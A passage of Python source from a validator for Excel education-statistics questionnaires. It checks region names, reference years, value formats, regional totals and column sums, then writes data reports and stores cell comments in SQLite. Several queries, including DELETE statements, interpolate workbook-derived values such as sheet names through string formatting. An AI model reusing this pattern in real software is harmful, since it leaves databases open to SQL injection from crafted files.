regions_names=sheet.col_values(id_start_coordinates[1]+1,\\\n id_start_coordinates[0],\\\n id_start_coordinates[0]+self.nadm1)\n all_regions_good=reduce( lambda x,y: x and y,\n ##The following line tests wether it is not empty and different that ...\n map( lambda region_name: region_name and region_name != \"...\" , \n regions_names))\n if (all_regions_good):\n self.print_log(\"Administrative divisions:\\n\")\n for region in regions_names:\n self.print_log(\" {}\\n\".format(region))\n self.print_log(\"\\n\")\n else:\n self.print_log(\"Error: Empty names for administrative divisions.\")\n return(all_regions_good)\n\n def check_reference_year(self):\n \"\"\"Checks that the reference year is filled with the right value.\"\"\"\n if (self.edit_mode):\n return(True)\n else:\n sheet=self.wb.sheet_by_name('Policy information')\n reference_year=sheet.cell(*indexes('M14')).value\n test_value= type(reference_year) == float or type(reference_year) == int\n if (test_value):\n self.print_log(\"Reference year: {0}\\n\".format(int(reference_year)))\n else:\n self.print_log(\"Error: Reference year not filled.\\n\")\n return(test_value)\n\n def check_front_page_year(self):\n \"\"\"Checks that the reference year is filled with the right value.\"\"\"\n if (self.edit_mode):\n return(True)\n else:\n front_page_variables = pre_vars['fixed_sheets']['Front Page']\n sheet = self.wb.sheet_by_name('Front Page')\n front_page_year = int(sheet.cell( *indexes( front_page_variables['school_year_ending'][0] ) ).value)\n test_value= type(front_page_year) == float or type(front_page_year) == int\n if (test_value):\n self.print_log(\"Front page - school year ending : {0}\\n\".format(int(front_page_year)))\n else:\n self.print_log(\"Error: Front page school year ending year not filled.\\n\")\n return(test_value)\n\n \n\n def check_country_name(self):\n \"\"\"Checks if the country name is filled.\"\"\"\n if (self.edit_mode):\n code_test=self.country_code\n if(not code_test ):\n self.print_log(\"Error: Country name was not found in the database.\\n\")\n return(code_test)\n else:\n front_page_variables=pre_vars['fixed_sheets']['Front Page']\n cellname=front_page_variables['country_name'][0]\n sheet=self.wb.sheet_by_name('Front Page')\n country_name=sheet.cell(*indexes(cellname)).value\n test_value=sheet.cell_type( *indexes(cellname) ) == front_page_variables['country_name'][1]\n code_test=self.country_code\n if (not test_value ):\n self.print_log(\"Error: Country name is not filled or has a wrong format.\\n\")\n elif(not code_test ):\n self.print_log(\"Error: Country name was not found in the database.\\n\")\n else:\n self.print_log(\"Country name is filled: {0}\\n\".format(country_name))\n return(test_value and code_test)\n \n def check_number_of_sheets(self):\n \"\"\"Checks the number of sheets in the excel file.\n\n For an edited questionnaire it returns True. For an original\n questoinnaire it checks if it has the same number of sheets\n than the questionnaire originally provided.\n \"\"\"\n if (self.edit_mode):\n return(True)\n else:\n if pre_vars['nsheets']==self.wb.nsheets:\n self.print_log(\"The correct number of sheets\"+ \"({})\".format(self.wb.nsheets) +\"has been submitted.\\n\")\n return(True)\n else:\n self.print_log(\"Error: Incorrect number of sheets submitted\\n\")\n return(False)\n \n def check_edited_configuration_part(self):\n \"\"\"Checks wether the questionnaire information is present in an edited questionnaire.\n\n This functions checks that the information table in the top\n left corner of the sheet exists and is an edited questionnaire.\n\n \"\"\"\n if (self.edit_mode):\n sheet=self.wb.sheets()[0]\n configuration_names=sheet.col_values(0,0,7) # names in the configuration (country, co_code, year,etc.). i.e. first column\n configuration_values=sheet.col_values(1,0,7) # values of the configuration, i.e. second column\n # test1 is to check if the names coincide with the exported ones\n test1= configuration_names == ['Country', 'CO_CODE', 'Year', 'Data', 'No.ADM', 'Series','Mode']\n # test2 is to check that the values are not empty (May be it could be improved). \n test2=reduce( lambda x,y: x and y, configuration_values)\n # test3 is to check that it is Edit mode and not Read only\n test3= configuration_values[6] == \"Edit\"\n test4=self.emco_year\n test5=self.database_type in ['OBS','REP','EST']\n test_value=test1 and test2 and test3 and test4 and test5\n if ( not ( test1 and test2 ) ):\n self.print_log(\"Error: Configuration section has wrong values.\\n\")\n elif( not test3 ):\n self.print_log(\"Error: Edited questionnaire is in read-only mode.\\n\")\n elif(not test4 ):\n self.print_log(\"Error: Non valid emco year.\\n\")\n elif(not test5 ):\n self.print_log(\"Error: Non valid database type.\\n\")\n else:\n self.print_log(\"Configuration section of edited questionnaire is properly filled\\n\") \n return(test_value)\n else:\n return(True)\n\n\n def check_one_value(self,value):\n \"\"\"Checks that value (the argument) is proper.\n \n This function can return the following values:\n 0 if there is an error.\n 1 if the value is OK.\n 2 accept but write error (A or N).\n 3 if there is an X with no reference.\n 4 if there is a missing value.\n \"\"\"\n return_value=0\n if((type(value) == int or type(value) == float) and value >=0 ):\n return_value=1\n elif(type(value) == str):\n #Accept regexp\n match1=re.search('[Xx]\\[[0-9]*:[0-9]+\\]|^[Zz]$',value)\n # Accept with error regexp\n match2=re.search('[Aa]$|^[Nn]$',value)\n # Undefined reference\n match3=re.search('^[Xx] *$',value)\n # Missing value\n match4=re.search('^ *$|^[Mm] *',value) \n if ( not (match1==None) ):\n return_value=1 \n elif ( not (match2==None) ):\n return_value=2\n elif ( not (match3==None) ):\n return_value=3\n elif ( not (match4==None) ):\n return_value=4 \n return(return_value)\n \n def add_missing_column(self,sheet_name,table,column):\n \"\"\"Adds a columns to the missing values dictionary.\"\"\"\n if (sheet_name in self.missing_data_dictionary.keys()):\n existing_tables_dict=self.missing_data_dictionary[sheet_name]\n if (table in existing_tables_dict):\n ## Checks go column by column, so it is not necessary\n ## to check if a column has already been added ot to\n ## use sets.\n existing_tables_dict[table]= existing_tables_dict[table] + [column]\n else:\n existing_tables_dict[table]=[column]\n else:\n self.missing_data_dictionary[sheet_name]={table:[column]}\n\n def add_data_issues(self,sheet_name,table,issue_type,relevant_data):\n \"\"\"Adds information to the data issues dictionary.\n \n\n There are 4 types of data issues: 'undefined_reference','check_less','column_sums','region_totals'.\n \n For 'check_less' relevant_data is [smaller_column bigger_column [ list of rows with problems] ].\n For 'undefined_reference' it is the column number.\n For 'column_sums' [[summands_columns],total_column,[row_problems]].\n For 'region_totals' it is the column number.\n \"\"\"\n if (sheet_name in self.data_issues_dictionary.keys()):\n existing_tables_dict=self.data_issues_dictionary[sheet_name]\n if (table in existing_tables_dict.keys()):\n existing_issues_dict=existing_tables_dict[table]\n if (issue_type in existing_issues_dict.keys() ):\n existing_issues_dict[issue_type] = existing_issues_dict[issue_type] + [relevant_data]\n else:\n existing_issues_dict[issue_type] = [relevant_data]\n else: \n existing_tables_dict[table] = {issue_type : [relevant_data]}\n else:## sheet_name in dictionay\n self.data_issues_dictionary[sheet_name] = {table : { issue_type: [relevant_data]}}\n\n \n def check_values(self):\n \"\"\"Checks that all the values in the questionnare are proper.\n\n This function returns false if there is at least one improper\n value in the questionnaire. In other words, if there is at\n least one value for which the function check_one_value returns\n 0. In this case it will also print the column and table name\n for all the improper values. \n\n If all the values are proper, but there are A or N's, it will\n print the column and table name where these ones are.\n\n If there are undefined references, they are added to the data\n issues dictionary and it prints a message saying that the\n questoinnaire contains undefined references.\n\n If there are missing values, it adds their column to the\n missing data dictionary and it prints a message saying that\n there are missing values in the questionnaire.\n\n \"\"\"\n edit_sheets_names=self.wb.sheet_names()\n cursor=self.conn.cursor()\n query=\"SELECT Tab,EXL_REF,RM_TABLE,Col FROM RM_MAPPING WHERE Tab in (\" + ','.join('?'*len(edit_sheets_names)) + \") AND AC!='ADM_NAME';\"\n #self.print_log(\"Checking that all the values are proper...\") \n cursor.execute(query, edit_sheets_names )\n mapping_table = cursor.fetchall()\n overall_test=1\n overall_missing=False\n overall_undefined_references=False\n for variables in mapping_table:\n table=variables[2]\n col_number=variables[3]\n sheet = self.wb.sheet_by_name(variables[0])\n meter_starting_index = variables[1]\n meter_starting_coordinates = indexes(meter_starting_index)\n ## We read the values for the regions\n meter_values = sheet.col_values(meter_starting_coordinates[1],\\\n meter_starting_coordinates[0],\\\n meter_starting_coordinates[0]+self.nadm1)\n ## We read the country value.\n meter_value_country=sheet.cell( meter_starting_coordinates[0]+self.nadm1+1,\\\n meter_starting_coordinates[1]).value\n meter_values=[meter_value_country]+meter_values\n # The following will be zero if there is at least one\n # error. 1 if everything is ok and 2 id there is at least one A or N.\n values_test=list(map( self.check_one_value,meter_values ))\n no_errors_test= 0 not in values_test\n if (0 in values_test):\n self.print_log(\"Error: Column {0} in {1} has improper values.\\n\".format(col_number,table))\n if (2 in values_test):\n self.print_log(\"Error: Column {0} in {1} has at least one A or N.\\n\".format(col_number,table))\n if (3 in values_test):\n #self.print_log(\"Error: Column {0} in table {1} has at least one undefined reference.\\n\".format(col_number,table))\n overall_undefined_references=True\n self.add_data_issues(variables[0],table,'undefined_reference',col_number )\n if (4 in values_test):\n #self.print_log(\"Error: Column {0} in table {1} has at least one missing value.\\n\".format(col_number,table))\n overall_missing=True\n self.add_missing_column(variables[0],table,col_number)\n # Next, add option for X.\n \n overall_test=overall_test and no_errors_test\n if overall_missing:\n self.print_log(\"Warning: The questionnaire contains missing values.\\n\")\n if overall_undefined_references:\n self.print_log(\"Warning: The questionnaire contains undefined references.\\n\")\n return(overall_test)\n \n def print_log(self,text_string,log_type=False):\n \"\"\" Puts the test in log and stdout.\n\n \"\"\"\n print(text_string,end='')\n if (not log_type): \n self.validation_log_file.write(text_string)\n self.validation_log_file.flush()\n os.fsync(self.validation_log_file.fileno())\n # else:\n # self.error_log_file.write(text_string)\n # self.error_log_file.flush()\n # os.fsync(self.error_log_file.fileno())\n\n \n\n def validation(self):\n \"\"\"Validation step for a questionnare.\n\n It makes the following checks:\n 1. Checks that tne number of administrative divisions is filled (method: check_nadm1).\n 2. Checks that the label of administrative divisions is filled (e.g. state, province, etc. ). (method: check_adm1_label)\n 3. Checks that the name of each administrative division is filled. (method: check_adm1_names)\n 4. Checks that the reference year is properly filled (Cell M14 from Administrative divisions). (method: check_reference_year)\n 5. Checks that the country name is filled. (method: check_country_name)\n 6. For an original questionnaire checks if the number of sheets in the questionnaire corresponds \n to the provided questionnaire. ( method: check_number_of_sheets )\n 7. For an edited questionnaire checks that the information section in the upper left corner exists. (method: check_edited_configuration_part) \n 8. Checks that all the values are proper. (method: check_values)\n\n If any of theses tests does not pass, this method returns False. Otherwise it returns True.\n \"\"\"\n check_variables=pre_vars[\"Checking sheet\"]\n self.print_log(\"----------\"+\"Date: \"+datetime.datetime.now().strftime(\"%B %d, %Y\")+\"----------\\n\")\n self.print_log(\"VALIDATION STEP\\n\\n\")\n if (not self.edit_mode):\n self.print_log(\"Original questionnaire submitted with path:\\n\")\n self.print_log(self.excel_file+\"\\n\\n\")\n administrative_divisions_variables=pre_vars['fixed_sheets']['Administrative divisions']\n else:\n self.print_log(\"Edited questionnaire submitted with path:\\n\")\n self.print_log(self.excel_file+\"\\n\\n\")\n\n nadm1_test=self.check_nadm1()\n adm1_label_test=self.check_adm1_label()\n adm1_names_test=self.check_adm1_names()\n front_year_test=self.check_front_page_year()\n reference_year_test=self.check_reference_year()\n country_name_test=self.check_country_name()\n number_of_sheets_test=self.check_number_of_sheets()\n edited_configuration_part_test=self.check_edited_configuration_part()\n values_test=self.check_values()\n print(\"\\n----------Questionnaire Validation finished.----------.\\n\")\n self.validation_log_file.close()\n return ( nadm1_test and adm1_label_test and adm1_names_test and front_year_test and reference_year_test and country_name_test and number_of_sheets_test and edited_configuration_part_test and values_test )\n\n def check_region_totals(self):\n \"\"\"Checks that the sum of the values of the regions adds up to the country total.\n\n For each emc_id in the table RM_Mapping it checks if the sum\n of the region values adds up to the country total. If this is\n the case it returns True, otherwise it returns False.\n\n \"\"\"\n cursor=self.conn.cursor()\n edit_sheets_names=self.wb.sheet_names()\n pass_test=True\n self.print_log(\"Checking that region values add to the country value...\", True)\n cursor.execute(\"SELECT Tab,EXL_REF,RM_TABLE,Col FROM RM_MAPPING;\") \n mapping_info=cursor.fetchall()\n for variables in mapping_info: \n tab=variables[0]\n if tab not in edit_sheets_names:\n continue\n exl_ref=variables[1]\n table=variables[2]\n col=variables[3]\n sheet = self.wb.sheet_by_name(tab)\n meter_starting_coordinates = indexes(exl_ref)\n ## Regional values\n meter_values = sheet.col_values(meter_starting_coordinates[1],\\\n meter_starting_coordinates[0],\\\n meter_starting_coordinates[0]+self.nadm1)\n ## Country value\n meter_value_country=sheet.cell( meter_starting_coordinates[0]+self.nadm1+1,\\\n meter_starting_coordinates[1]).value\n ## If there are missing values or references we do not\n ## make any check.\n all_numbers = reduce(lambda x,y: x and y,\n map( lambda x: x in [int,float], \n map(lambda x: type(x) , meter_values))\n )\n if (all_numbers):\n regions_sum=reduce(lambda x,y : x+y, meter_values)\n if (regions_sum != meter_value_country):\n ## Error para el log\n if pass_test:\n self.print_log(\"\\n\", True)\n self.add_data_issues(tab,table,'region_totals',col)\n self.print_log(\"The regional figures do not add up to the country total in {0} column {1}\\n\".format(table,col), True)\n pass_test=False\n cursor.close()\n if pass_test :\n self.print_log(\"Test passed.\\n\", True) \n return(pass_test)\n\n def check_less(self):\n \"\"\"Checks that certain columns are less or equal than others.\n \n Checks that the list of pairs in each each key in\n check_less_dictionary satisfy that the first one is smaller\n than the second one.\n\n \"\"\"\n check_less_dictionary={\n ## All the inequalities correspond to the first table\n 'Table 0.1' : [ [16,14], [17,15], [13,12] ],\n 'Table 1.1' :[ [4,3], [6,5],[8,7],[10,9],[12,11],[14,13] ],\n 'Table 2.1' :[ [4,3], [6,5],[8,7],[10,9],[12,11],[14,13] ],\n 'Table 3.1' :[ [4,3], [6,5],[8,7],[10,9],[12,11],[14,13] ],\n 'Table 4.1' :[ [4,3], [6,5],[8,7],[10,9],[12,11],[14,13] ]\n }\n table_sheet_dictionary={\n 'Table 0.1' : 'Pupils' ,\n 'Table 1.1' : 'Teachers ISCED 1' ,\n 'Table 2.1' : 'Teachers ISCED 2' ,\n 'Table 3.1' : 'Teachers ISCED 3' ,\n 'Table 4.1' : 'Teachers ISCED 23'\n }\n cursor=self.conn.cursor()\n pass_test=True\n self.print_log(\"Checking that parts are less than the totals...\", True)\n for table,pairs_list in check_less_dictionary.items():\n sheet_name=table_sheet_dictionary[table]\n if sheet_name not in self.wb.sheet_names():\n continue\n sheet=self.wb.sheet_by_name(sheet_name)\n for pairs in pairs_list:\n cursor.execute(\"SELECT EXL_REF FROM RM_MAPPING WHERE RM_TABLE=\\'{}\\' AND Col={}\".format(table,pairs[0]))\n ref_smaller=cursor.fetchone()[0]\n cursor.execute(\"SELECT EXL_REF FROM RM_MAPPING WHERE RM_TABLE=\\'{}\\' AND Col={}\".format(table,pairs[1]))\n ref_bigger=cursor.fetchone()[0]\n smaller_meter_starting_coordinates = indexes(ref_smaller)\n bigger_meter_starting_coordinates = indexes(ref_bigger)\n smaller_meter_values=sheet.col_values(smaller_meter_starting_coordinates[1],\n smaller_meter_starting_coordinates[0],\n smaller_meter_starting_coordinates[0]+self.nadm1)\n bigger_meter_values=sheet.col_values(bigger_meter_starting_coordinates[1],\n bigger_meter_starting_coordinates[0],\n bigger_meter_starting_coordinates[0]+self.nadm1)\n rows_with_problem=[]\n for i in range(self.nadm1):\n ## Error para el log\n small_value=smaller_meter_values[i]\n big_value=bigger_meter_values[i]\n if (type(small_value) in [int,float] and type(big_value) in [int,float] and small_value > big_value):\n rows_with_problem=rows_with_problem+[i+1]\n if pass_test:\n self.print_log(\"\\n\", True)\n self.print_log(\"{}: In row {} the value of column {} is bigger than the value in column {}.\\n\".format(sheet_name,i+1,pairs[0],pairs[1]), True)\n pass_test=False\n if rows_with_problem:\n self.add_data_issues(sheet_name, table,'check_less',[pairs[0],pairs[1],rows_with_problem ])\n \n cursor.close()\n if pass_test :\n self.print_log(\"Test passed.\\n\", True) \n return(pass_test)\n\n\n def add_values(self,x,y):\n \"\"\"If both x and y are numbers returns their sum. Otherwise the value of one of them.\"\"\" \n if ( type(x) in [int,float] and type(y) in [int,float]):\n return(x+y)\n elif( type(x) not in [int,float] ):\n return(x)\n else:\n return(y)\n\n def are_equal(self,x,y):\n \"\"\"Checks is x and y are equal numbers. \n\n Returns True if both x and y are numbers and they are equal or\n if at least one of the values is not a number. Otherwise it\n returns False.\n \"\"\"\n if ( ( (type(x) in [int,float] ) and (type(y) in [int,float]) and x==y) or ( (type(x) not in [int,float] ) or (type(y) not in [int,float]) ) ):\n return(True)\n else:\n return(False)\n \n def check_column_sums(self):\n \"\"\"Checks columns that have to add up to other columns.\n \n Some pairs of columns are supposed to add up to other\n columns. This method checks that this is the case based on the\n local variable check_columns_sums_dictionary. In that\n dictionary, the keys are table names and the value is a list\n with pairs. Each pair has as a first element a list of column\n numbers and the second element is another column number. It is\n checked that the sum of the values in the columns in the list\n (the first element in the pair), add up to the single column\n number (the second element in the pair).\n\n \"\"\"\n check_columns_sums_dictionary={\n ## Each item has two items. The first item is a list whose\n ## terms have to add up to the second item\n 'Table 1.1' : [ [[20,21,22],3 ],[[23,24,25],7] ],\n 'Table 2.1' : [ [[26,27,28],3] , [[29,30,31],7 ] ],\n 'Table 3.1' : [ [[26,27,28],3] , [[29,30,31],7 ] ],\n 'Table 4.1' : [ [[26,27,28],3] , [[29,30,31],7 ] ],\n 'Table 1.2' : [ [[3,4,5,6,7,8,9,10],3 ],[[11,12,13,14,15,16,17,18],7 ],[ [19,20,21,22,23,24,25,26],11 ] ],\n 'Table 2.2' : [ [[3,4,5,6,7,8,9,10],3 ],[[11,12,13,14,15,16,17,18],7 ],[ [19,20,21,22,23,24,25,26],11 ] ],\n 'Table 3.2' : [ [[3,4,5,6,7,8,9,10],3 ],[[11,12,13,14,15,16,17,18],7 ],[ [19,20,21,22,23,24,25,26],11 ] ],\n 'Table 4.2' : [ [[3,4,5,6,7,8,9,10],3 ],[[11,12,13,14,15,16,17,18],7 ],[ [19,20,21,22,23,24,25,26],11 ] ],\n 'Table 1.3' : [ [[3,5,6,7,8,9,10],3 ] , [[11,13,14,15,16,17,18],7] , [[19,21,22,23,24,25,26 ],11 ] ],\n 'Table 2.3' : [ [[3,5,6,7,8,9,10],3 ] , [[11,13,14,15,16,17,18],7] , [[19,21,22,23,24,25,26 ],11 ] ],\n 'Table 3.3' : [ [[3,5,6,7,8,9,10],3 ] , [[11,13,14,15,16,17,18],7] , [[19,21,22,23,24,25,26 ],11 ] ],\n 'Table 4.3' : [ [[3,5,6,7,8,9,10],3 ] , [[11,13,14,15,16,17,18],7] , [[19,21,22,23,24,25,26 ],11 ] ],\n 'Table 1.4' : [ [[3,4,5,6,7,8,9],3], [ [10,11,12,13,14,15,16],7], [[17,18,19,20,21,22,23],11 ] ],\n 'Table 2.4' : [ [[3,4,5,6,7,8,9],3], [ [10,11,12,13,14,15,16],7], [[17,18,19,20,21,22,23],11 ] ],\n 'Table 3.4' : [ [[3,4,5,6,7,8,9],3], [ [10,11,12,13,14,15,16],7], [[17,18,19,20,21,22,23],11 ] ],\n 'Table 4.4' : [ [[3,4,5,6,7,8,9],3], [ [10,11,12,13,14,15,16],7], [[17,18,19,20,21,22,23],11 ] ],\n }\n cursor=self.conn.cursor()\n pass_test=True\n self.print_log(\"Checking sums of columns...\", True)\n for table_name,columns_sum_list in check_columns_sums_dictionary.items():\n cursor.execute(\"SELECT Tab FROM RM_Mapping WHERE RM_TABLE=\\'{}\\' LIMIT 1\".format(table_name))\n sheet_name=cursor.fetchone()[0]\n if sheet_name not in self.wb.sheet_names():\n continue\n sheet=self.wb.sheet_by_name(sheet_name)\n for columns_sum_info in columns_sum_list:\n summands_columns=columns_sum_info[0]\n total_column=columns_sum_info[1]\n ## We start by finding the totals\n \n ## First we accumulate the sums of the summans columns in a list\n accumulated_sum=[0]*self.nadm1\n for column_number in summands_columns:\n cursor.execute(\"SELECT EXL_REF FROM RM_Mapping WHERE RM_TABLE=\\'{}\\' and Col=\\'{}\\'\".format(table_name,column_number))\n ref=cursor.fetchone()[0]\n column_starting_coordinates= indexes(ref)\n column_meter_values=sheet.col_values(column_starting_coordinates[1],\n column_starting_coordinates[0],\n\n column_starting_coordinates[0]+self.nadm1)\n accumulated_sum=map(self.add_values, accumulated_sum,column_meter_values )\n ## Now we get the total values\n ## The total column is always in the first table of the sheet.\n total_table_name=table_name[0:8]+\"1\" \n cursor.execute(\"SELECT EXL_REF FROM RM_Mapping WHERE RM_TABLE=\\'{}\\' and Col=\\'{}\\'\".format(total_table_name,total_column))\n ref=cursor.fetchone()[0]\n column_starting_coordinates= indexes(ref)\n total_column_values=sheet.col_values(column_starting_coordinates[1],\n column_starting_coordinates[0],\n column_starting_coordinates[0]+self.nadm1)\n list_accumulated_sum=list(accumulated_sum)\n tests_vector=list(map( self.are_equal , list_accumulated_sum , total_column_values ))\n rows_problem=[]\n for i in range(1,self.nadm1+1):\n if (not tests_vector[i-1]):\n rows_problem=rows_problem+[i]\n if rows_problem:\n ## We need to add a second argument to print_log here.\n self.add_data_issues(sheet_name,table_name,'column_sums',[summands_columns,total_column,rows_problem])\n self.print_log(\"Columns {} in {} do not add to column {} in {}. Problems in row(s) {}.\\n\".format(summands_columns,table_name,total_column,total_table_name,rows_problem), True)\n pass_test= (not rows_problem) and pass_test\n return(pass_test)\n\n def write_data_report(self):\n \"\"\"Writed the data report file.\n\n The data report is written after validation. If there is\n missing data it starts listing the sheet table and columns\n where there is missing data.\n\n Then, if there are data issues different than missing data, it\n prints the sheet table columns and data issue one by one based\n on the data issues dictionary.\n\n Finally it prints all the items that have \"No\" in the Checking\n sheet of the questionnaire.\n\n \"\"\"\n cursor=self.conn.cursor()\n data_report_path=self.log_folder + \"/{}\".format(self.country_name) + \"_\"+datetime.datetime.now().strftime(\"%y-%m-%d-%H-%M\")+\"_data_report.csv\"\n self.data_report_file=data_report_path\n file=open(data_report_path,'a')\n if ( not (self.missing_data_dictionary or self.data_issues_dictionary ) ):\n file.write('No data issues were found.,')\n else:\n if self.missing_data_dictionary:\n file.write(\"1. Missing data:,\\n\\n\")\n sheet_names_list=list(self.missing_data_dictionary.keys())\n sheet_names_list.sort()\n for sheet_name in sheet_names_list: \n file.write(\"Sheet: {},\\n\".format(sheet_name))\n table_list=list(self.missing_data_dictionary[sheet_name].keys())\n table_list.sort()\n for table in table_list :\n cursor.execute(\"SELECT RM_TABLE_NAME FROM RM_Mapping WHERE RM_TABLE=?\", (table,) )\n table_name=cursor.fetchone()[0]\n file.write(\",\\\"{0}: {1}\\\",\\n\".format(table,table_name))\n file.write(\",\\\"Missing data in column(s) {}\\\",\\n\".format( self.missing_data_dictionary[sheet_name][table] ))\n file.write(\"\\n\\n\")\n if self.data_issues_dictionary:\n file.write(\"2. Data Issues:,\\n\\n\")\n for sheet_name in self.data_issues_dictionary.keys():\n file.write(\"Sheet: {},\\n\".format(sheet_name))\n for table in self.data_issues_dictionary[sheet_name].keys():\n cursor.execute(\"SELECT RM_TABLE_NAME FROM RM_Mapping WHERE RM_TABLE=?\", (table,) )\n table_name=cursor.fetchone()[0]\n file.write(\",\\\"{0}: {1}\\\",\\n\".format(table,table_name))\n for issue in self.data_issues_dictionary[sheet_name][table].keys():\n if 'undefined_reference' == issue:\n file.write(\",\\\"Undefined reference(s) in column(s) {}.\\\",\\n\".format(self.data_issues_dictionary[sheet_name][table][issue]) )\n elif 'region_totals' == issue:\n file.write(\",\\\"Regional values do not add up to country value in column(s) {}.\\\",\\n\".format(self.data_issues_dictionary[sheet_name][table][issue]) )\n elif 'column_sums' == issue:\n for relevant_data in self.data_issues_dictionary[sheet_name][table][issue]:\n summands=relevant_data[0]\n total_column=relevant_data[1]\n rows=relevant_data[2]\n file.write(\",\\\"Column(s) {0} do not add up to column {1} on row(s) {2}.\\\",\\n\".format(summands,total_column,rows))\n elif 'check_less' == issue:\n for relevant_data in self.data_issues_dictionary[sheet_name][table][issue]:\n smaller_column=relevant_data[0]\n bigger_column=relevant_data[1]\n rows=relevant_data[2]\n file.write(\",\\\"Value in column {0} is greater than value in column {1} on row(s) {2}.\\\",\\n\".format(smaller_column,bigger_column,rows))\n ## If it is an original questionnaire print in the data reports if there are nos.\n if(not self.edit_mode):\n check_variables=pre_vars[\"Checking sheet\"]\n sheet=self.wb.sheet_by_name(\"Checking sheet\")\n printed_main_message=False\n for sheet_name in check_variables.keys():\n for var in [[x, check_variables[sheet_name][1] ] for x in check_variables[sheet_name][0] ]:\n if( sheet.cell( *var ).value == 'No' ):\n if(not printed_main_message): \n file.write(\"\\n\\nThe following items have No in the Checking sheet:\\n\")\n printed_main_message=True\n var[1]-=5\n file.write(\"\\\"{0}:\\\", \\\"{1}\\\"\\n\".format( sheet_name, sheet.cell(*var).value ))\n cursor.close()\n file.close()\n \n def emc_id_from_cell_info(self,sheet_name,xlrd_vector_coordinates):\n \"\"\"Returns the emc_id given cell xlrd coordinates.\n\n xlrd_vector_coordinates should be a list with the xlrd\n coordinates.\n sheet_name is the name of the sheet in which the cell is.\n \"\"\"\n excel_ref=indexes_inverse(xlrd_vector_coordinates)\n row=xlrd_vector_coordinates[0]\n col_ref=None\n # col_ref contains the EXL_REF that can be found in the\n # Rm_Mapping table.\n if (sheet_name==\"Pupils\" and ( (row>= 17 and row<=16+self.nadm1) or row==18+self.nadm1) ):\n col_ref=re.sub(\"[0-9]+\",\"18\",excel_ref )\n elif ( sheet_name==\"Administrative divisions\" and ( (row>= 20 and row<=19+self.nadm1) or row==21+self.nadm1) ) :\n col_ref=re.sub(\"[0-9]+\",\"21\",excel_ref )\n elif ( (row>= 18 and row<=17+self.nadm1) or row==19+self.nadm1) :\n col_ref=re.sub(\"[0-9]+\",\"19\", excel_ref )\n\n cursor=self.conn.cursor()\n cursor.execute(\"SELECT EMC_ID FROM RM_Mapping WHERE EXL_REF = '{0}' AND Tab = '{1}' ;\".format(col_ref,sheet_name ) )\n emc_id=cursor.fetchone()\n if emc_id:\n emc_id=emc_id[0]\n ## We can only make comments on region names in the administrative divisions sheet.\n if ( (emc_id in [900001,900002]) and sheet_name!=\"Administrative divisions\" ):\n emc_id=None\n cursor.close()\n return(emc_id)\n\n def extract_comments(self):\n \"\"\"Writes the cell comments to the comments table.\n \"\"\"\n # Tuple of tuples with the information of the data Each entry\n # will be (emc_id,co_code,adm_code,emco_year,comments)\n\n # Missing: Check that the comment should be in the meters\n cursor=self.conn.cursor()\n edu_table_name=\"EDU_FTN97_\"+self.database_type\n for sheet in self.wb.sheets():\n cursor.execute(\"SELECT {0}.CO_CODE,{0}.EMCO_YEAR,{0}.EMC_ID,RM_Mapping.Tab FROM {0} LEFT JOIN RM_MAPPING ON {0}.EMC_ID=RM_MAPPING.EMC_ID WHERE RM_Mapping.Tab=\\\"{3}\\\" AND ( ( {0}.EMCO_YEAR={1} AND RM_MAPPING.CUR_YEAR=0 ) OR ( {0}.EMCO_YEAR={2} AND RM_MAPPING.CUR_YEAR=-1) )\".format(edu_table_name,self.emco_year,self.emco_year-1,sheet.name) )\n things_to_erase=cursor.fetchall()\n for values_to_erase in things_to_erase:\n cursor.execute(\"DELETE FROM EDU_FTN97_\"+self.database_type+\" WHERE CO_CODE={0} AND EMCO_YEAR={1} AND EMC_ID={2}\".format(values_to_erase[0],values_to_erase[1],values_to_erase[2]))\n self.conn.commit()\n \n #delete from Authors where AuthorId=1 \n comments_table_tupple=() \n for sheet in self.wb.sheets(): \n for xlrd_coord in sheet.cell_note_map.keys():\n \n emc_id=self.emc_id_from_cell_info(sheet.name, xlrd_coord )\n if emc_id:\n emco_year=self.emco_year\n cursor.execute(\"SELECT RM_TABLE FROM RM_Mapping WHERE EMC_ID={0} limit 1;\".format(emc_id))\n \n table1=cursor.fetchone()[0][5:]\n ## If it is table i, we are in administrative divisions\n ## so we set the table to -1.\n if (table1==\" i\"):\n table=-1\n else:\n table=float( table1 )\n if (sheet.name== \"Pupils\"):\n adm_code=xlrd_coord[0]-16\n if adm_code>self.nadm1:\n adm_code=0\n elif (sheet.name!= \"Administrative divisions\"):\n adm_code=xlrd_coord[0]-17\n if adm_code>self.nadm1:\n adm_code=0\n #OLD CODE\n # if (emc_id in [20162,20166,20172,20184] and xlrd_coord[1] == 21 ):\n # emco_year= emco_year - 1\n # ENDS OLD CODE\n else:\n adm_code=xlrd_coord[0]-19\n if adm_code>self.nadm1:\n adm_code=0 \n comment=sheet.cell_note_map[xlrd_coord].text\n if not self.edit_mode:\n author=self.country_name\n else:\n author=sheet.cell_note_map[xlrd_coord].author\n match=re.search('\\[(\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2})\\] (.*)',comment, re.MULTILINE|re.DOTALL)\n if match==None:\n date_string=datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") # We are not forced to use this format\n else:\n date_string=match.group(1)\n comment=match.group(2)\n\n \n comments_table_tupple=comments_table_tupple + ( (self.country_code,adm_code,emco_year, emc_id,comment,table,author,date_string) , )\n if comments_table_tupple:\n cursor.executemany(\"INSERT OR REPLACE INTO EDU_FTN97_\"+self.database_type+\"(CO_CODE,ADM_CODE,EMCO_YEAR,EMC_ID,FTN_CODE,FTN_DATA,NTABLE,QUESTNAME,USERNAME,DATE_ADDED)\" + \" VALUES(?,?,?,?,1,?,?,'R',?,?);\", comments_table_tupple )\n self.conn.commit()\n cursor.close()\n\n def read_regions_from_sheet(self):\n \"\"\"Reads region names from the questionnaire.\n \n It reads the region names from the questoinnaire and creates\n the attribute self.regions_from_sheet containing the read names.\n \"\"\"\n administrative_divisions_variables=pre_vars['fixed_sheets']['Administrative divisions']\n sheet=self.wb.sheet_by_name('Administrative divisions')\n id_start_coordinates=indexes( administrative_divisions_variables['id_start'][0])\n self.regions_from_sheet=sheet.col_values(id_start_coordinates[1]+1,\\\n id_start_coordinates[0],\\\n id_start_coordinates[0]+self.nadm1)\n\n \n def compare_region_names(self):\n \"\"\"Compares region names in sheet and database.\n \n Returns 1 if regions do not exist in the database. If they\n exist, returns True if names in the database are the same than\n in the sheet and False otherwise.\n\n \"\"\"\n if (self.regions_from_sheet==None):\n self.read_regions_from_sheet()\n regions_from_database=self.get_regions()\n if (not regions_from_database):\n return(1)\n else:\n 